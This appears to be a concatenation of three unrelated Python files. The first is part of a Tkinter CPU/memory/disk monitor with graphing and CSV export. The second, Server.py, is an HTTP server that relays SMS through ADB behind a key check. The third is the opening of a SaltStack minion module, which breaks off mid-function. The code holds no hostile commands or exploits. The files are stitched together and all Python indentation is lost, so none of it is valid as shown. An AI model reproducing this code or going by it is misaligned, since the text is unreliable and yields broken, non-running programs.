# Add Calendar
top = tk.Frame(tab2)
bottom = tk.Frame(tab2)
T = tk.Label(tab2, text="From:")
T.pack(pady=10)
cal_tab2_var = tk.StringVar()
cal_tab2_var.set(datetime.now().strftime("%d/%m/%y"))
cal_tab2 = Calendar(tab2, textvariable=cal_tab2_var, selectmode='day', date_pattern='y-mm-dd', mindate=datetime.now() - timedelta(days=31),
maxdate=datetime.now(), weekendbackground='#FFFFFF', othermonthbackground='#FFFFFF', othermonthwebackground='#FFFFFF', showweeknumbers=False)
cal_tab2_var.set(datetime.now().strftime("%Y-%m-%d"))
cal_tab2.pack()
top.pack()
clicked_tab2 = tk.StringVar()
clicked_tab2.set("Hour")
options = ['Hour'] + [str(i) for i in range(24)]
drop = tk.OptionMenu(tab2, clicked_tab2, *options)
drop.pack(in_=top, side=tk.LEFT)
clicked1_tab2 = tk.StringVar()
clicked1_tab2.set("Minutes")
options = ['Minutes'] + [str(i) for i in range(60)]
drop1 = tk.OptionMenu(tab2, clicked1_tab2, *options)
drop1.pack(in_=top, side=tk.RIGHT)
T = tk.Label(tab2, text="To:")
T.pack(pady=10)
cal1_tab2_var = tk.StringVar()
cal1_tab2_var.set(datetime.now().strftime("%d/%m/%y"))
cal1_tab2 = Calendar(tab2, textvariable=cal1_tab2_var, selectmode='day', date_pattern='y-mm-dd', mindate=datetime.now() - timedelta(days=31),
maxdate=datetime.now(), weekendbackground='#FFFFFF', othermonthbackground='#FFFFFF', othermonthwebackground='#FFFFFF', showweeknumbers=False)
cal1_tab2_var.set(datetime.now().strftime("%Y-%m-%d"))
cal1_tab2.pack()
bottom.pack()
clicked2_tab2 = tk.StringVar()
clicked2_tab2.set("Hour")
options = ['Hour'] + [str(i) for i in range(24)]
drop2 = tk.OptionMenu(tab2, clicked2_tab2, *options)
drop2.pack(in_=bottom, side=tk.LEFT)
clicked3_tab2 = tk.StringVar()
clicked3_tab2.set("Minutes")
options = ['Minutes'] + [str(i) for i in range(60)]
drop3 = tk.OptionMenu(tab2, clicked3_tab2, *options)
drop3.pack(in_=bottom, side=tk.RIGHT)
def grad_date():
a = clicked_tab2.get()
if a == "Hour":
a = "0"
b = clicked1_tab2.get()
if b == "Minutes":
b = "0"
a1 = clicked2_tab2.get()
if a1 == "Hour":
a1 = "23"
b1 = clicked3_tab2.get()
if b1 == "Minutes":
b1 = "59"
date1 = datetime.strptime(
cal_tab2.get_date() + f' {a}:{b}:00', '%Y-%m-%d %H:%M:%S')
date2 = datetime.strptime(
cal1_tab2.get_date() + f' {a1}:{b1}:59', '%Y-%m-%d %H:%M:%S')
data = database_util.get_data_from_date(date1, date2)
if len(data) == 0:
data = [[cal_tab2.get_date() + f' {a}:{b}',0,1,0,1,0]]
# create 3 subplots for cpu, memory, disk
fig, axs = plt.subplots(3, dpi=100, figsize=(6, 5))
fig.tight_layout(pad=4)
axs[0].set_title("CPU")
axs[1].set_title("MEMORY")
axs[2].set_title("DISK")
axs[0].set_ylabel("Percent")
axs[1].set_ylabel("Percent")
axs[2].set_ylabel("Percent")
axs[0].set_xlabel("Time")
x_data = [date1 + timedelta(minutes=i)
for i in range(int((date2-date1).total_seconds()//60) + 1)]
x_from_the_dataa = [datetime.strptime(
i[0], "%Y-%m-%d %H:%M") for i in data]
main_list = [None]*int((x_from_the_dataa[0]-date1).total_seconds()//60)
main_list2 = [None]*int((date2-x_from_the_dataa[-1]).total_seconds()//60)
y_data_cpu,y_data_mem,y_data_disk = main_list[:],main_list[:],main_list[:]
yhaha_cpu = [float(ts[1]) for ts in data]
yhaha_mem = [(float(ts[3])/float(ts[2]))*100 for ts in data]
yhaha_disk = [(float(ts[5])/float(ts[4]))*100 for ts in data]
for i in range(len(x_from_the_dataa)-1):
y_data_cpu.append(yhaha_cpu[i])
y_data_mem.append(yhaha_mem[i])
y_data_disk.append(yhaha_disk[i])
temp = [None]*(int((x_from_the_dataa[i+1]-x_from_the_dataa[i]).total_seconds()//60)-1)
y_data_cpu.extend(temp)
y_data_mem.extend(temp)
y_data_disk.extend(temp)
y_data_cpu.extend([yhaha_cpu[-1]]+main_list2)
y_data_mem.extend([yhaha_mem[-1]]+main_list2)
y_data_disk.extend([yhaha_disk[-1]]+main_list2)
axs[0].set_ylim(0, 101)
axs[1].set_ylim(0, 101)
axs[2].set_ylim(0, 101)
axs[0].set_xlim(date1, date2)
axs[1].set_xlim(date1, date2)
axs[2].set_xlim(date1, date2)
axs[0].plot(x_data, y_data_cpu)
axs[1].plot(x_data, y_data_mem)
axs[2].plot(x_data, y_data_disk)
plt.show()
def switch_tab2(*args):
a = clicked_tab2.get()
if a == "Hour":
a = "0"
b = clicked1_tab2.get()
if b == "Minutes":
b = "0"
a1 = clicked2_tab2.get()
if a1 == "Hour":
a1 = "23"
b1 = clicked3_tab2.get()
if b1 == "Minutes":
b1 = "59"
date1 = datetime.strptime(
cal_tab2.get_date() + f' {a}:{b}:00', '%Y-%m-%d %H:%M:%S')
date2 = datetime.strptime(
cal1_tab2.get_date() + f' {a1}:{b1}:00', '%Y-%m-%d %H:%M:%S')
if date1 >= date2:
button2.config(state='disabled')
else:
button2.config(state='normal')
clicked_tab2.trace("w", switch_tab2)
clicked1_tab2.trace("w", switch_tab2)
clicked2_tab2.trace("w", switch_tab2)
clicked3_tab2.trace("w", switch_tab2)
cal_tab2_var.trace("w", switch_tab2)
cal1_tab2_var.trace("w", switch_tab2)
# Add Button and Label
button2 = tk.Button(tab2, text="Get Data",
command=grad_date)
button2.pack(pady=20)
######
'''TAB 3'''
######
top = tk.Frame(tab3)
bottom = tk.Frame(tab3)
T = tk.Label(tab3, text="From:")
T.pack(pady=10)
cal_var = tk.StringVar()
cal_var.set(datetime.now().strftime("%d/%m/%y"))
cal = Calendar(tab3, textvariable=cal_var, selectmode='day', date_pattern='y-mm-dd', mindate=datetime.now() - timedelta(days=31),
maxdate=datetime.now(), weekendbackground='#FFFFFF', othermonthbackground='#FFFFFF', othermonthwebackground='#FFFFFF', showweeknumbers=False)
cal_var.set(datetime.now().strftime("%Y-%m-%d"))
cal.pack()
top.pack()
clicked = tk.StringVar()
clicked.set("Hour")
options = ['Hour'] + [str(i) for i in range(24)]
drop = tk.OptionMenu(tab3, clicked, *options)
drop.pack(in_=top, side=tk.LEFT)
clicked1 = tk.StringVar()
clicked1.set("Minutes")
options = ['Minutes'] + [str(i) for i in range(60)]
drop1 = tk.OptionMenu(tab3, clicked1, *options)
drop1.pack(in_=top, side=tk.RIGHT)
T = tk.Label(tab3, text="To:")
T.pack(pady=10)
cal1_var = tk.StringVar()
cal1_var.set(datetime.now().strftime("%d/%m/%y"))
cal1 = Calendar(tab3, textvariable=cal1_var, selectmode='day', date_pattern='y-mm-dd', mindate=datetime.now() - timedelta(days=31),
maxdate=datetime.now(), weekendbackground='#FFFFFF', othermonthbackground='#FFFFFF', othermonthwebackground='#FFFFFF', showweeknumbers=False)
cal1_var.set(datetime.now().strftime("%Y-%m-%d"))
cal1.pack()
bottom.pack()
clicked2 = tk.StringVar()
clicked2.set("Hour")
options = ['Hour'] + [str(i) for i in range(24)]
drop2 = tk.OptionMenu(tab3, clicked2, *options)
drop2.pack(in_=bottom, side=tk.LEFT)
clicked3 = tk.StringVar()
clicked3.set("Minutes")
options = ['Minutes'] + [str(i) for i in range(60)]
drop3 = tk.OptionMenu(tab3, clicked3, *options)
drop3.pack(in_=bottom, side=tk.RIGHT)
def save_file_date():
a = clicked.get()
if a == "Hour":
a = "0"
b = clicked1.get()
if b == "Minutes":
b = "0"
a1 = clicked2.get()
if a1 == "Hour":
a1 = "23"
b1 = clicked3.get()
if b1 == "Minutes":
b1 = "59"
date1 = datetime.strptime(
cal.get_date() + f' {a}:{b}:00', '%Y-%m-%d %H:%M:%S')
date2 = datetime.strptime(
cal1.get_date() + f' {a1}:{b1}:59', '%Y-%m-%d %H:%M:%S')
data = database_util.get_data_from_date(date1, date2)
files = [('', '*.csv')]
f = filedialog.asksaveasfile(filetypes=files, defaultextension=files)
if f is None: # asksaveasfile return `None` if dialog closed with "cancel".
return
a = f.name
f.close()
with open(a, 'w', newline='') as f:
writer = csv.writer(f)
writer.writerow(["TIME", "CPU", "MEMORY_TOTAL_BYTES",
"MEMORY_USED_BYTES", "DISK_TOTAL_BYTES", "DISK_USED_BYTES"])
writer.writerows(data)
def save_file_all():
files = [('', '*.csv')]
f = filedialog.asksaveasfile(filetypes=files, defaultextension=files)
if f is None:
return
a = f.name
f.close()
with open(a, 'w', newline='') as f:
with open('data1.csv', 'r+', newline='') as f1:
reader = csv.reader(f1)
writer = csv.writer(f)
writer.writerow(["TIME", "CPU", "MEMORY_TOTAL_BYTES",
"MEMORY_USED_BYTES", "DISK_TOTAL_BYTES", "DISK_USED_BYTES"])
writer.writerows(list(reader))
def switch(*args):
a = clicked.get()
if a == "Hour":
a = "0"
b = clicked1.get()
if b == "Minutes":
b = "0"
a1 = clicked2.get()
if a1 == "Hour":
a1 = "23"
b1 = clicked3.get()
if b1 == "Minutes":
b1 = "59"
date1 = datetime.strptime(
cal_var.get() + f' {a}:{b}:00', '%Y-%m-%d %H:%M:%S')
date2 = datetime.strptime(
cal1.get_date() + f' {a1}:{b1}:00', '%Y-%m-%d %H:%M:%S')
if date1 >= date2:
button1.config(state='disabled')
else:
button1.config(state='normal')
clicked.trace("w", switch)
clicked1.trace("w", switch)
clicked2.trace("w", switch)
clicked3.trace("w", switch)
cal_var.trace("w", switch)
cal1_var.trace("w", switch)
# Add Button and Label
button1 = tk.Button(tab3, text="Get data between dates",
command=save_file_date)
button1.pack(pady=10)
tk.Button(tab3, text="Get all data", command=save_file_all).pack()
######
'''TAB 4'''
######
def upload_data():
window.update()
filename = filedialog.askopenfile(title="Select a File",
filetypes=[("CSV files",
"*.csv")])
if filename is None:
return
f = filename.name
filename.close()
with open(f, 'r', newline='') as f:
reader = csv.reader(f)
data = list(reader)[1:]
fig, axs = plt.subplots(3, dpi=100, figsize=(6, 5))
fig.tight_layout(pad=4)
axs[0].set_title("CPU")
axs[1].set_title("MEMORY")
axs[2].set_title("DISK")
axs[0].set_ylabel("Percent")
axs[1].set_ylabel("Percent")
axs[2].set_ylabel("Percent")
axs[0].set_xlabel("Time")
date_list = [i[0] for i in data]
for i in range(len(date_list)):
date_list[i] = datetime.strptime(
date_list[i], '%Y-%m-%d %H:%M')
date1 = min(date_list)
date2 = max(date_list)
x_data = [date1 + timedelta(minutes=i)
for i in range(int((date2-date1).total_seconds()//60) + 1)]
x_from_the_dataa = [datetime.strptime(
i[0], "%Y-%m-%d %H:%M") for i in data]
main_list = [None]*int((x_from_the_dataa[0]-date1).total_seconds()//60)
main_list2 = [None]*int((date2-x_from_the_dataa[-1]).total_seconds()//60)
y_data_cpu,y_data_mem,y_data_disk = main_list[:],main_list[:],main_list[:]
yhaha_cpu = [float(ts[1]) for ts in data]
yhaha_mem = [(float(ts[3])/float(ts[2]))*100 for ts in data]
yhaha_disk = [(float(ts[5])/float(ts[4]))*100 for ts in data]
for i in range(len(x_from_the_dataa)-1):
y_data_cpu.append(yhaha_cpu[i])
y_data_mem.append(yhaha_mem[i])
y_data_disk.append(yhaha_disk[i])
temp = [None]*(int((x_from_the_dataa[i+1]-x_from_the_dataa[i]).total_seconds()//60)-1)
y_data_cpu.extend(temp)
y_data_mem.extend(temp)
y_data_disk.extend(temp)
y_data_cpu.extend([yhaha_cpu[-1]]+main_list2)
y_data_mem.extend([yhaha_mem[-1]]+main_list2)
y_data_disk.extend([yhaha_disk[-1]]+main_list2)
axs[0].set_ylim(0, 101)
axs[1].set_ylim(0, 101)
axs[2].set_ylim(0, 101)
axs[0].set_xlim(date1, date2)
axs[1].set_xlim(date1, date2)
axs[2].set_xlim(date1, date2)
axs[0].plot(x_data, y_data_cpu)
axs[1].plot(x_data, y_data_mem)
axs[2].plot(x_data, y_data_disk)
plt.show()
def change_state(*args):
with open("bg_run.txt", 'w') as f:
f.write(str(Checkbutton1.get()))
Checkbutton1 = tk.IntVar()
with open('bg_run.txt', 'r') as f:
Checkbutton1.set(int(f.read()))
Checkbutton1.trace("w", change_state)
Import = tk.LabelFrame(tab4, relief='flat')
Settings = tk.LabelFrame(tab4, relief='flat')
tk.Label(tab4, text="Upload data from file", font=(
'Arial', 18)).pack(in_=Import, pady=10)
tk.Button(tab4, text="Upload data", command=upload_data).pack(
in_=Import, pady=10)
tk.Label(tab4, text="Settings", font=(
'Arial', 18)).pack(in_=Settings, pady=10)
tk.Checkbutton(tab4, text="Keep running in Background?",
variable=Checkbutton1,
onvalue=1,
offvalue=0,
height=1,
width=25).pack(in_=Settings, pady=10)
Import.grid(row=0, column=0, sticky="nsew", pady=10)
Settings.grid(row=1, column=0, sticky="nsew", pady=10)
tab4.grid_rowconfigure(0, minsize=tab1.winfo_height()//2)
tab4.grid_columnconfigure(0, minsize=tab1.winfo_width())
return window, cpu_graph, mem_graph, disk_graph
def poll():
global thread_death, run_in_bg
while True:
with open("bg_run.txt", 'r') as f:
bg_run = int(f.read())
if (thread_death and not(bg_run)) or not(run_in_bg):
print("\nShutting down...")
break
# update graphs with new data
new_data = data_util.get_all_parsed_data()
cache.update_data(new_data)
time.sleep(0.9)
return
thread_death = False
run_in_bg = True
def main():
try:
t1 = threading.Thread(target=poll)
t1.start()
window, cpu_graph, mem_graph, disk_graph = setup_window()
cpu_graph.animate()
mem_graph.animate()
disk_graph.animate()
def on_closing():
global thread_death, run_in_bg
thread_death = True
window.destroy()
with open("bg_run.txt", 'r') as f:
bg_run = int(f.read())
if bg_run == 1:
nu = input("Press enter to exit")
run_in_bg = False
window.protocol("WM_DELETE_WINDOW", on_closing)
window.mainloop()
except KeyboardInterrupt:
print("\nShutting down...")
exit()
if __name__ == "__main__":
main()
|
Server.py
|
from http.server import BaseHTTPRequestHandler, HTTPServer
import cgi
import sys
import threading
import re
from Adb_Handler import Adb_Handler as AdbHandler
class Server(BaseHTTPRequestHandler):
verbose = False
key = ''
deviceId = ''
adbHandler = AdbHandler
def start(self, ip, port, key, deviceId, verbose):
self.verbose = verbose
self.key = key
self.deviceId = deviceId
print('Starting server...')
server_address = (ip, port)
self.httpd = HTTPServer(server_address, Server)
thread = threading.Thread(target = self.httpd.serve_forever)
thread.daemon = True
thread.start()
print('Server started on: ' + ip + ':' + str(port))
def stop(self):
self.httpd.shutdown()
self.httpd.server_close()
print('Server stopped')
def do_POST(self):
self.send_response(200)
self.send_header('Content-type', 'application/json')
self.end_headers()
print(self.headers['content-type'])
ctype, pdict = cgi.parse_header(self.headers['content-type'])
if ctype == 'application/x-www-form-urlencoded':
length = int(self.headers['content-length'])
postVars = cgi.parse_qs(self.rfile.read(length), keep_blank_values=1)
else:
postVars = {}
if bytes('key', 'utf8') in postVars:
try:
key = postVars[bytes('key', 'utf8')][0].decode('utf-8')
msg = postVars[bytes('msg', 'utf8')][0].decode('utf-8')
rec = postVars[bytes('rec', 'utf8')][0].decode('utf-8')
except:
message = '{ "status":"error_decoding_params" }'
self.wfile.write(bytes(message, 'utf8'))
return
else:
message = '{ "status":"no_auth" }'
self.wfile.write(bytes(message, 'utf8'))
return
if key == self.key:
rule = re.compile(r'(^\+[0-9]{1,3}[0-9]{10,11}$)')
if rule.search(rec):
if len(msg) == 0:
message = '{ "status":"EMPTY_MESSAGE" }'
elif len(msg) > 160:
message = '{ "status":"MESSAGE_EXCEEDS_160_CHAR_LIMIT" }'
else:
if (self.adbHandler.sendSms(AdbHandler, self.deviceId, rec, msg)):
message = '{ "status":"REQUEST_PROCESSED" }'
else:
message = '{ "status":"ERROR_PROCESSING_REQUEST" }'
else:
message = '{ "status":"INVALID_RECEIVER" }'
else:
message = '{ "status":"WRONG_AUTH" }'
self.wfile.write(bytes(message, 'utf8'))
if self.verbose:
print(postVars)
def log_message(self, format, *args):
if self.verbose:
sys.stderr.write("%s - - [%s] %s\n" %
(self.address_string(),
self.log_date_time_string(),
format%args))
|
minion.py
|
# -*- coding: utf-8 -*-
'''
Routines to set up a minion
'''
# Import python libs
from __future__ import absolute_import, print_function, with_statement, unicode_literals
import functools
import os
import sys
import copy
import time
import types
import signal
import random
import logging
import threading
import traceback
import contextlib
import multiprocessing
from random import randint, shuffle
from stat import S_IMODE
import salt.serializers.msgpack
from binascii import crc32
# Import Salt Libs
# pylint: disable=import-error,no-name-in-module,redefined-builtin
from salt.ext import six
from salt._compat import ipaddress
from salt.utils.network import parse_host_port
from salt.ext.six.moves import range
from salt.utils.zeromq import zmq, ZMQDefaultLoop, install_zmq, ZMQ_VERSION_INFO
import salt.transport.client
import salt.defaults.exitcodes
from salt.utils.ctx import RequestContext
# pylint: enable=no-name-in-module,redefined-builtin
import tornado
HAS_PSUTIL = False
try:
import salt.utils.psutil_compat as psutil
HAS_PSUTIL = True
except ImportError:
pass
HAS_RESOURCE = False
try:
import resource
HAS_RESOURCE = True
except ImportError:
pass
try:
import zmq.utils.monitor
HAS_ZMQ_MONITOR = True
except ImportError:
HAS_ZMQ_MONITOR = False
try:
import salt.utils.win_functions
HAS_WIN_FUNCTIONS = True
except ImportError:
HAS_WIN_FUNCTIONS = False
# pylint: enable=import-error
# Import salt libs
import salt
import salt.client
import salt.crypt
import salt.loader
import salt.beacons
import salt.engines
import salt.payload
import salt.pillar
import salt.syspaths
import salt.utils.args
import salt.utils.context
import salt.utils.data
import salt.utils.error
import salt.utils.event
import salt.utils.files
import salt.utils.jid
import salt.utils.minion
import salt.utils.minions
import salt.utils.network
import salt.utils.platform
import salt.utils.process
import salt.utils.schedule
import salt.utils.ssdp
import salt.utils.user
import salt.utils.zeromq
import salt.defaults.events
import salt.defaults.exitcodes
import salt.cli.daemons
import salt.log.setup
import salt.utils.dictupdate
from salt.config import DEFAULT_MINION_OPTS
from salt.defaults import DEFAULT_TARGET_DELIM
from salt.utils.debug import enable_sigusr1_handler
from salt.utils.event import tagify
from salt.utils.odict import OrderedDict
from salt.utils.process import (default_signals,
SignalHandlingMultiprocessingProcess,
ProcessManager)
from salt.exceptions import (
CommandExecutionError,
CommandNotFoundError,
SaltInvocationError,
SaltReqTimeoutError,
SaltClientError,
SaltSystemExit,
SaltDaemonNotRunning,
SaltException,
SaltMasterUnresolvableError
)
import tornado.gen # pylint: disable=F0401
import tornado.ioloop # pylint: disable=F0401
log = logging.getLogger(__name__)
# To set up a minion:
# 1. Read in the configuration
# 2. Generate the function mapping dict
# 3. Authenticate with the master
# 4. Store the AES key
# 5. Connect to the publisher
# 6. Handle publications
def resolve_dns(opts, fallback=True):
'''
Resolves the master_ip and master_uri options
'''
ret = {}
check_dns = True
if (opts.get('file_client', 'remote') == 'local' and
not opts.get('use_master_when_local', False)):
check_dns = False
# Since salt.log is imported below, salt.utils.network needs to be imported here as well
import salt.utils.network
if check_dns is True:
try:
if opts['master'] == '':
raise SaltSystemExit
ret['master_ip'] = salt.utils.network.dns_check(
opts['master'],
int(opts['master_port']),
True,
opts['ipv6'],
attempt_connect=False)
except SaltClientError:
retry_dns_count = opts.get('retry_dns_count', None)
if opts['retry_dns']:
while True:
if retry_dns_count is not None:
if retry_dns_count == 0:
raise SaltMasterUnresolvableError
retry_dns_count -= 1
import salt.log
msg = ('Master hostname: \'{0}\' not found or not responsive. '
'Retrying in {1} seconds').format(opts['master'], opts['retry_dns'])
if salt.log.setup.is_console_configured():
log.error(msg)
else:
print('WARNING: {0}'.format(msg))
time.sleep(opts['retry_dns'])
try:
ret['master_ip'] = salt.utils.network.dns_check(
opts['master'],
int(opts['master_port']),
True,
opts['ipv6'],
attempt_connect=False)
break
except SaltClientError:
pass
else:
if fallback:
ret['master_ip'] = '127.0.0.1'
else:
raise
except SaltSystemExit:
unknown_str = 'unknown address'
master = opts.get('master', unknown_str)
if master == '':
master = unknown_str
if opts.get('__role') == 'syndic':
err = 'Master address: \'{0}\' could not be resolved. Invalid or unresolveable address. ' \
'Set \'syndic_master\' value in minion config.'.format(master)
else:
err = 'Master address: \'{0}\' could not be resolved. Invalid or unresolveable address. ' \
'Set \'master\' value in minion config.'.format(master)
log.error(err)
raise SaltSystemExit(code=42, msg=err)
else:
ret['master_ip'] = '127.0.0.1'
if 'master_ip' in ret and 'master_ip' in opts:
if ret['master_ip'] != opts['master_ip']:
log.warning(
'Master ip address changed from %s to %s',
opts['master_ip'], ret['master_ip']
)
if opts['source_interface_name']:
log.trace('Custom source interface required: %s', opts['source_interface_name'])
interfaces = salt.utils.network.interfaces()
log.trace('The following interfaces are available on this Minion:')
log.trace(interfaces)
if opts['source_interface_name'] in interfaces:
if interfaces[opts['source_interface_name']]['up']:
addrs = interfaces[opts['source_interface_name']]['inet'] if not opts['ipv6'] else\
interfaces[opts['source_interface_name']]['inet6']
ret['source_ip'] = addrs[0]['address']
log.debug('Using %s as source IP address', ret['source_ip'])
else:
log.warning('The interface %s is down so it cannot be used as source to connect to the Master',
opts['source_interface_name'])
else:
log.warning('%s is not a valid interface. Ignoring.', opts['source_interface_name'])
elif opts['source_address']:
ret['source_ip'] = salt.utils.network.dns_check(
opts['source_address'],
int(opts['source_ret_port']),
True,
opts['ipv6'],
attempt_connect=False)
log.debug('Using %s as source IP address', ret['source_ip'])
if opts['source_ret_port']:
ret['source_ret_port'] = int(opts['source_ret_port'])
log.debug('Using %d as source port for the ret server', ret['source_ret_port'])
if opts['source_publish_port']:
ret['source_publish_port'] = int(opts['source_publish_port'])
log.debug('Using %d as source port for the master pub', ret['source_publish_port'])
ret['master_uri'] = 'tcp://{ip}:{port}'.format(
ip=ret['master_ip'], port=opts['master_port'])
log.debug('Master URI: %s', ret['master_uri'])
return ret
def prep_ip_port(opts):
'''
parse host:port values from opts['master'] and return valid:
master: ip address or hostname as a string
master_port: (optional) master returner port as integer
e.g.:
- master: 'localhost:1234' -> {'master': 'localhost', 'master_port': 1234}
- master: '127.0.0.1:1234' -> {'master': '127.0.0.1', 'master_port' :1234}
- master: '[::1]:1234' -> {'master': '::1', 'master_port': 1234}
- master: 'fe80::a00:27ff:fedc:ba98' -> {'master': 'fe80::a00:27ff:fedc:ba98'}
'''
ret = {}
# Use given master IP if "ip_only" is set or if master_ip is an ipv6 address without
# a port specified. The is_ipv6 check returns False if brackets are used in the IP
# definition such as master: '[::1]:1234'.
if opts['master_uri_format'] == 'ip_only':
ret['master'] = ipaddress.ip_address(opts['master'])
else:
host, port = parse_host_port(opts['master'])
ret = {'master': host}
if port:
ret.update({'master_port': port})
return ret
def get_proc_dir(cachedir, **kwargs):
'''
Given the cache directory, return the directory that process data is
stored in, creating it if it doesn't exist.
The following optional Keyword Arguments are handled:
mode: which is anything os.makedir would accept as mode.
uid: the uid to set, if not set, or it is None or -1 no changes are
made. Same applies if the directory is already owned by this
uid. Must be int. Works only on unix/unix like systems.
gid: the gid to set, if not set, or it is None or -1 no changes are
made. Same applies if the directory is already owned by this
gid. Must be int. Works only on unix/unix like systems.
'''
fn_ = os.path.join(cachedir, 'proc')
mode = kwargs.pop('mode', None)
if mode is None:
mode = {}
else:
mode = {'mode': mode}
if not os.path.isdir(fn_):
# proc_dir is not present, create it with mode settings
os.makedirs(fn_, **mode)
d_stat = os.stat(fn_)
# if mode is not an empty dict then we have an explicit
# dir mode. So lets check if mode needs to be changed.
if mode:
mode_part = S_IMODE(d_stat.st_mode)
if mode_part != mode['mode']:
os.chmod(fn_, (d_stat.st_mode ^ mode_part) | mode['mode'])
if hasattr(os, 'chown'):
# only on unix/unix like systems
uid = kwargs.pop('uid', -1)
gid = kwargs.pop('gid', -1)
# if uid and gid are both -1 then go ahead with
# no changes at all
if (d_stat.st_uid != uid or d_stat.st_gid != gid) and \
[i for i in (uid, gid) if i != -1]:
os.chown(fn_, uid, gid)
return fn_
def load_args_and_kwargs(func, args, data=None, ignore_invalid=False):
'''
Detect the args and kwargs that need to be passed to a function call, and
check them against what was passed.
'''
argspec = salt.utils.args.get_function_argspec(func)
_args = []
_kwargs = {}
invalid_kwargs = []
for arg in args:
if isinstance(arg, dict) and arg.pop('__kwarg__', False) is True:
# if the arg is a dict with __kwarg__ == True, then its a kwarg
for key, val in six.iteritems(arg):
if argspec.keywords or key in argspec.args:
# Function supports **kwargs or is a positional argument to
# the function.
_kwargs[key] = val
else:
# **kwargs not in argspec and parsed argument name not in
# list of positional arguments. This keyword argument is
# invalid.
invalid_kwargs.append('{0}={1}'.format(key, val))
continue
else:
string_kwarg = salt.utils.args.parse_input([arg], condition=False)[1] # pylint: disable=W0632
if string_kwarg:
if argspec.keywords or next(six.iterkeys(string_kwarg)) in argspec.args:
# Function supports **kwargs or is a positional argument to
# the function.
_kwargs.update(string_kwarg)
else:
# **kwargs not in argspec and parsed argument name not in
# list of positional arguments. This keyword argument is
# invalid.
for key, val in six.iteritems(string_kwarg):
invalid_kwargs.append('{0}={1}'.format(key, val))
else:
_args.append(arg)
if invalid_kwargs and not ignore_invalid:
salt.utils.args.invalid_kwargs(invalid_kwargs)
if argspec.keywords and isinstance(data, dict):
# this function accepts **kwargs, pack in the publish data
for key, val in six.iteritems(data):
_kwargs['__pub_{0}'.format(key)] = val
return _args, _kwargs
def eval_master_func(opts):
'''
Evaluate master function if master type is 'func'
and save it result in opts['master']
'''
if '__master_func_evaluated' not in opts:
# split module and function and try loading the module
mod_fun = opts['master']
mod, fun = mod_fun.split('.')
try:
master_mod = salt.loader.raw_mod(opts, mod, fun)
if not master_mod:
raise KeyError
# we take whatever the module returns as master address
opts['master'] = master_mod[mod_fun]()
# Check for valid types
if not isinstance(opts['master'], (six.string_types, list)):
raise TypeError
opts['__master_func_evaluated'] = True
except KeyError:
log.error('Failed to load module %s', mod_fun)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
except TypeError:
log.error('%s returned from %s is not a string', opts['master'], mod_fun)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
log.info('Evaluated master from module: %s', mod_fun)
def master_event(type, master=None):
'''
Centralized master event function which will return event type based on event_map
'''
event_map = {'connected': '__master_connected',
'disconnected': '__master_disconnected',
'failback': '__master_failback',
'alive': '__master_alive'}
if type == 'alive' and master is not None:
return '{0}_{1}'.format(event_map.get(type), master)
return event_map.get(type, None)
def service_name():
'''
Return the proper service name based on platform
'''
return 'salt_minion' if 'bsd' in sys.platform else 'salt-minion'
class MinionBase(object):
def __init__(self, opts):
self.opts = opts
@staticmethod
def process_schedule(minion, loop_interval):
try:
if hasattr(minion, 'schedule'):
minion.schedule.eval()
else:
log.error('Minion scheduler not initialized. Scheduled jobs will not be run.')
return
# Check if scheduler requires lower loop interval than
# the loop_interval setting
if minion.schedule.loop_interval < loop_interval:
loop_interval = minion.schedule.loop_interval
log.debug(
'Overriding loop_interval because of scheduled jobs.'
)
except Exception as exc:
log.error('Exception %s occurred in scheduled job', exc)
return loop_interval
def process_beacons(self, functions):
'''
Evaluate all of the configured beacons, grab the config again in case
the pillar or grains changed
'''
if 'config.merge' in functions:
b_conf = functions['config.merge']('beacons', self.opts['beacons'], omit_opts=True)
if b_conf:
return self.beacons.process(b_conf, self.opts['grains']) # pylint: disable=no-member
return []
@tornado.gen.coroutine
def eval_master(self,
opts,
timeout=60,
safe=True,
failed=False,
failback=False):
'''
Evaluates and returns a tuple of the current master address and the pub_channel.
In standard mode, just creates a pub_channel with the given master address.
With master_type=func evaluates the current master address from the given
module and then creates a pub_channel.
With master_type=failover takes the list of masters and loops through them.
The first one that allows the minion to create a pub_channel is then
returned. If this function is called outside the minions initialization
phase (for example from the minions main event-loop when a master connection
loss was detected), 'failed' should be set to True. The current
(possibly failed) master will then be removed from the list of masters.
'''
# return early if we are not connecting to a master
if opts['master_type'] == 'disable':
log.warning('Master is set to disable, skipping connection')
self.connected = False
raise tornado.gen.Return((None, None))
# Run masters discovery over SSDP. This may modify the whole configuration,
# depending of the networking and sets of masters.
# if we are using multimaster, discovery can only happen at start time
# because MinionManager handles it. by eval_master time the minion doesn't
# know about other siblings currently running
if isinstance(self.opts['discovery'], dict) and not self.opts['discovery'].get('multimaster'):
self._discover_masters()
# check if master_type was altered from its default
if opts['master_type'] != 'str' and opts['__role'] != 'syndic':
# check for a valid keyword
if opts['master_type'] == 'func':
eval_master_func(opts)
# if failover or distributed is set, master has to be of type list
elif opts['master_type'] in ('failover', 'distributed'):
if isinstance(opts['master'], list):
log.info(
'Got list of available master addresses: %s',
opts['master']
)
if opts['master_type'] == 'distributed':
master_len = len(opts['master'])
if master_len > 1:
secondary_masters = opts['master'][1:]
master_idx = crc32(opts['id']) % master_len
try:
preferred_masters = opts['master']
preferred_masters[0] = opts['master'][master_idx]
preferred_masters[1:] = [m for m in opts['master'] if m != preferred_masters[0]]
opts['master'] = preferred_masters
log.info('Distributed to the master at \'%s\'.', opts['master'][0])
except (KeyError, AttributeError, TypeError):
log.warning('Failed to distribute to a specific master.')
else:
log.warning('master_type = distributed needs more than 1 master.')
if opts['master_shuffle']:
log.warning(
'Use of \'master_shuffle\' detected. \'master_shuffle\' is deprecated in favor '
'of \'random_master\'. Please update your minion config file.'
)
opts['random_master'] = opts['master_shuffle']
opts['auth_tries'] = 0
if opts['master_failback'] and opts['master_failback_interval'] == 0:
opts['master_failback_interval'] = opts['master_alive_interval']
# if opts['master'] is a str and we have never created opts['master_list']
elif isinstance(opts['master'], six.string_types) and ('master_list' not in opts):
# We have a string, but a list was what was intended. Convert.
# See issue 23611 for details
opts['master'] = [opts['master']]
elif opts['__role'] == 'syndic':
log.info('Syndic setting master_syndic to \'%s\'', opts['master'])
# if failed=True, the minion was previously connected
# we're probably called from the minions main-event-loop
# because a master connection loss was detected. remove
# the possibly failed master from the list of masters.
elif failed:
if failback:
# failback list of masters to original config
opts['master'] = opts['master_list']
else:
log.info(
'Moving possibly failed master %s to the end of '
'the list of masters', opts['master']
)
if opts['master'] in opts['local_masters']:
